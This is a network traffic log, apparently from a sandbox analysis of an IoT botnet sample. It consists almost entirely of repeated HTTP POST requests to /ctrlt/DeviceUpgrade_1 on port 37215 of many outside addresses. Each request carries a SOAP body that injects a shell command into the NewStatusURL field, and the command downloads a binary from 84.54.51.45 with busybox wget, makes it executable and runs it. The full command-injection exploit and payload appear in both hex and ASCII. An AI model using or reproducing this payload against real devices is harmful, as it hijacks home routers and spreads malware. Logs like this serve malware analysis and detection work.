                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            150192.168.2.1557162197.11.77.12537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176381111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            151192.168.2.1543146197.117.126.1537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176418066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            152192.168.2.1534884197.35.145.6337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176439047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            153192.168.2.1544080197.125.212.16537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176461935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            154192.168.2.1537560197.210.171.19037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176501989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            155192.168.2.1537060197.173.72.20337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176518917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            156192.168.2.1544032197.202.185.22537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176569939 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            157192.168.2.1537100197.6.103.24137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176610947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            158192.168.2.1554590197.234.107.6337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176610947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            159192.168.2.1551352197.186.253.21937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176618099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
